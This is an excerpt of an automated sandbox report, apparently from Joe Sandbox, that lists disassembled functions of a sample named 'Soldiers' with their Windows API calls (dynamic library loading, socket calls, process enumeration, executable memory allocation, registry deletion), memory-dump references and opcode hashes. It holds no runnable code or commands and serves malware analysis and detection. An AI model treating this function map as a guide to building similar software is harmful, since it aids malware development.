                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 0d94f235f418c2c4e52f5fcf770f076d0f19fe19db0ed6b1960967ece2bd6317
                                                          • Instruction ID: 7b7eb32c8d110f72d7f1694e53f1f1e7b3792222e09eeac8b0ef2ec0059b2f24
                                                          • Opcode Fuzzy Hash: 0d94f235f418c2c4e52f5fcf770f076d0f19fe19db0ed6b1960967ece2bd6317
                                                          • Instruction Fuzzy Hash: 6DD05B71525713CFD7209F75CC0960676D9AF46395F15C82ED4D5D3160DB70D4C0CA10
                                                          Function 008F55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,008F5E3D), ref: 008F55FE
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008F5610
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: 5c1c69fd76f8d60f4cac5102cf7ae0dfb3b9c445eba93b771b8f506063796a77
                                                          • Instruction ID: ffe0de5b0e08912565e52180e783cbf3fce944d7de0a39e0d51af686330775ce
                                                          • Opcode Fuzzy Hash: 5c1c69fd76f8d60f4cac5102cf7ae0dfb3b9c445eba93b771b8f506063796a77
                                                          • Instruction Fuzzy Hash: 78D0C776834B12CFE3208F70C80822AB7E4BF91749B40C82AD69AC2290E674C8C0CA40
                                                          Function 009597CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009593DE,?,00970980), ref: 009597D8
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009597EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 89e29ee67f9def782d7ff0dd0f0f23fa9d5fc3b97f42aa6ff93ceebd40fd68ab
                                                          • Instruction ID: af679d5a35854baf1db55abfa3ac8d88d6aef1fd87703dfd2dd7fec280f6f3fe
                                                          • Opcode Fuzzy Hash: 89e29ee67f9def782d7ff0dd0f0f23fa9d5fc3b97f42aa6ff93ceebd40fd68ab
                                                          • Instruction Fuzzy Hash: B6D01271534713CFE7209F35D98960A76D8FF89396B11C82AD8C9E2150EB74C4C0CB11
                                                          Function 00937D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f262cff62d2e7417043f53447fc7427c8fd98be290df42d9ab6fbe96c792b02
                                                          • Instruction ID: b7f413647a1538035ba833c9b0c0b40602e8e527bdde0cb62bf72e6112eaa431
                                                          • Opcode Fuzzy Hash: 0f262cff62d2e7417043f53447fc7427c8fd98be290df42d9ab6fbe96c792b02
                                                          • Instruction Fuzzy Hash: 76C11A75A0421AEFCB24CF94C884AAAF7B9FF48714F158598E805EB251DB31ED81DF90
                                                          Function 0095E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 0095E7A7
                                                          • CharLowerBuffW.USER32(?,?), ref: 0095E7EA
                                                            • Part of subcall function 0095DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095DEAE
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0095E9EA
                                                          • _memmove.LIBCMT ref: 0095E9FD
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 8edd6abd47a033e7cf1e8cb76a2ff1351e7548f208d9c9941eb1f6678040ebde
                                                          • Instruction ID: 074e642a879fdb1ff479dab2e650e5f015110755f11c400414a948a5df4fdd24
                                                          • Opcode Fuzzy Hash: 8edd6abd47a033e7cf1e8cb76a2ff1351e7548f208d9c9941eb1f6678040ebde
                                                          • Instruction Fuzzy Hash: B9C14971A083019FC718DF29C490A6ABBE4FF89714F04896DF999DB351D731EA49CB82
                                                          Function 0095877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 009587AD
                                                          • CoUninitialize.OLE32 ref: 009587B8
                                                            • Part of subcall function 0096DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00958A0E,?,00000000), ref: 0096DF71
                                                          • #8.OLEAUT32(?), ref: 009587C3
                                                          • #9.WSOCK32(?), ref: 00958A94
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 948891078-0
                                                          • Opcode ID: 08582b42fd1e3015e92b1c45a0bca51e2cf7bef7459351707cf881db9b23886f
                                                          • Instruction ID: 505541e772b0204423be8bc60a46ef99151f23eeb1bd7eb94989a7eb49d690fb
                                                          • Opcode Fuzzy Hash: 08582b42fd1e3015e92b1c45a0bca51e2cf7bef7459351707cf881db9b23886f
                                                          • Instruction Fuzzy Hash: A6A16A756047419FD710DF1AC881B2AB7E4FF89364F148849F999AB3A2CB30ED04CB92
                                                          Function 0093814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00973C4C,?), ref: 00938308
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00973C4C,?), ref: 00938320
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00970988,000000FF,?,00000000,00000800,00000000,?,00973C4C,?), ref: 00938345
                                                          • _memcmp.LIBCMT ref: 00938366
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 06436ee669ba4e895e2925191508a0299285c97e70d942a557e472f0aa857b5d
                                                          • Instruction ID: 605bf67d1b16e9593ba5820a7df6d363414b32810c86737032011f14fde65657
                                                          • Opcode Fuzzy Hash: 06436ee669ba4e895e2925191508a0299285c97e70d942a557e472f0aa857b5d
                                                          • Instruction Fuzzy Hash: A2810875A00209EFCB04DF94C888EEEB7B9FF89315F204558F515AB250DB71AE05CB61
                                                          Function 0093749B Relevance: 6.2, APIs: 4, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(?,0000004E,?,00000001,?,?,?,?,?,?,?,?,?,0093779C,00000000,?), ref: 009374AC
                                                          • #2.WSOCK32(0000004E,?,?,?,?,0093779C,00000000,?,00959B28,?,0000004E,00000000,?), ref: 00937555
                                                          • #10.WSOCK32(?,?,?,?,?,?,?,0093779C,00000000,?,00959B28,?,0000004E,00000000,?), ref: 00937584
                                                          • #9.WSOCK32(?,00000000,?,?,?,?,?,0093779C,00000000,?,00959B28,?,0000004E,00000000,?), ref: 009375AB
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78aedb184fe8691869680e3f561866c3227b46aab0efcfa1e8573afcddfe4086
                                                          • Instruction ID: 41de6886edca03604654f23f83a87dfc7711178a7c49adeb1162d3317f1547e2
                                                          • Opcode Fuzzy Hash: 78aedb184fe8691869680e3f561866c3227b46aab0efcfa1e8573afcddfe4086
                                                          • Instruction Fuzzy Hash: 4A51B8B4608B02DAD7349FB988A6B2DF3E9EF45314F209C1FE546D72A1DB3498408F02
                                                          Function 0095F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0095F526
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0095F534
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0095F5F4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0095F603
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: 729065e8ad77cdb2a153148bf1ee3ff2208c8fc8c3eabb025e3fc3fbb48ac2ce
                                                          • Instruction ID: 98c183a903e01196cee9a280789641b142ac5c02d7578e1cac4f8507e46bfe23
                                                          • Opcode Fuzzy Hash: 729065e8ad77cdb2a153148bf1ee3ff2208c8fc8c3eabb025e3fc3fbb48ac2ce
                                                          • Instruction Fuzzy Hash: CE519DB1108315AFD710EF25DC85A6BB7E8FF95710F40492DF985D72A1EB70AA08CB92
                                                          Function 00969E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetWindowRect.USER32(?,?,?,?,00000002,?,?), ref: 00969E88
                                                          • ScreenToClient.USER32(00000002,00000002,?,?,00000002,?,?), ref: 00969EBB
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00969F28
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: 107d432899ff2820f5eb25e8c7d3999a6e91d20d34eb65ed524b0dba62f806f5
                                                          • Instruction ID: af2fc1fa3306fe4b57cb4f25886e87e76fe97ca53481389818dee4358d4f4c37
                                                          • Opcode Fuzzy Hash: 107d432899ff2820f5eb25e8c7d3999a6e91d20d34eb65ed524b0dba62f806f5
                                                          • Instruction Fuzzy Hash: EF515031A04209EFCF11DF58C9859AE7BBAFF85320F118659F825DB2A0D731AD91DB90
                                                          Function 0090492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction ID: 1c76f49ee1d9b3d25efc22c92b96f062e5eefb25424741416e1346104ef6e178
                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction Fuzzy Hash: 0541DAB1700706AFDF28CFA9C88096F77A9AF84760B24853DE665C76C0D774DD908B44
                                                          Function 0093A638 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0093A68A
                                                          • __itow.LIBCMT ref: 0093A6BB
                                                            • Part of subcall function 0093A90B: SendMessageW.USER32(?,0000113E,00000000,00000000,?,00000000,00000028,00000800,?,00000028,?,?,?,00000000), ref: 0093A976
                                                          • SendMessageW.USER32(?,0000110A,00000001,?,?,0000110A,00000004,00000000), ref: 0093A724
                                                          • __itow.LIBCMT ref: 0093A77B
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: d66cf6ce78f5f630a96fd50d2b6151a3f411930626538c377383c84dfbae3970
                                                          • Instruction ID: 89fa94edaa80081c3179e925932b66393ca2002182a81d759c2967c071a464a8
                                                          • Opcode Fuzzy Hash: d66cf6ce78f5f630a96fd50d2b6151a3f411930626538c377383c84dfbae3970
                                                          • Instruction Fuzzy Hash: A1414274A0020DAFDF11EF64C89ABFE7BB9EB84754F440019FA45A3291DB719A44CA93
                                                          Function 00957095 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #23.WSOCK32(00000002,00000002,00000011), ref: 009570BC
                                                          • #111.WSOCK32(00000000), ref: 009570CC
                                                            • Part of subcall function 008E4D37: __itow.LIBCMT ref: 008E4D62
                                                            • Part of subcall function 008E4D37: __swprintf.LIBCMT ref: 008E4DAC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00957130
                                                          • #111.WSOCK32(00000000), ref: 0095713C
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: #111$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3577594119-0
                                                          • Opcode ID: f39ca08fb225769a904aabd6931fbcbbdf86ff17b23613c77c04e7a48cc42f8f
                                                          • Instruction ID: 1af300b843d1c585e649e97d21a333107f715b6c0eec89ce88eadea1f7de7687
                                                          • Opcode Fuzzy Hash: f39ca08fb225769a904aabd6931fbcbbdf86ff17b23613c77c04e7a48cc42f8f
                                                          • Instruction Fuzzy Hash: 4B41B175744200AFE720AF69DC86F2A77E8EB45B14F048458FA1DDF3C2DA709D008B92
                                                          Function 00956B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00970980), ref: 00956B92
                                                          • _strlen.LIBCMT ref: 00956BC4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: e2663401ea24b076e66b208abca3a26aabebafc6c6d121db415f510907b12f44
                                                          • Instruction ID: 25991b0df2192c23d82f443805a3a53843812de96a49d7f61ecbe0825f78d4b7
                                                          • Opcode Fuzzy Hash: e2663401ea24b076e66b208abca3a26aabebafc6c6d121db415f510907b12f44
                                                          • Instruction Fuzzy Hash: C9410231A00108AFCB04FBA9CC81FBEB3A9EF94311F508154FA5AD7292DB30AD05CB51
                                                          Function 0094BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0094BEE1
                                                          • GetLastError.KERNEL32(?,00000000), ref: 0094BF07
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0094BF2C
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0094BF58
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 0c1e5cddebf811eb649bd7b6fd0b6b0f85671b507ef56a562fc0094f24c1fb58
                                                          • Instruction ID: 17ec8cf2fb93c432bed964dcf621acfcd02e5af47441d11b915706e433e1882d
                                                          • Opcode Fuzzy Hash: 0c1e5cddebf811eb649bd7b6fd0b6b0f85671b507ef56a562fc0094f24c1fb58
                                                          • Instruction Fuzzy Hash: EB412C36700A50DFCB11EF19C845A59BBE5FF89320B19C498E8499B362CB30FD42DB92
                                                          Function 00968E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00968F03
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
